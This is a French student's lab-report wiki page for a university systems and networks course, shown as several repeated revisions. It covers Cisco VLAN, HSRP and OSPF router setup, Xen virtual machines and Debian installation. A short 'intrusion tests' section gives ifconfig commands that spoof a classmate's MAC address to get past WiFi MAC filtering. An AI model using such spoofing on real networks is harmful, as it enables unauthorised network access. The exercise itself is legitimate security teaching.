On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22946</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22946"/>
				<updated>2015-11-13T14:53:20Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22935</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22935"/>
				<updated>2015-11-13T14:25:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
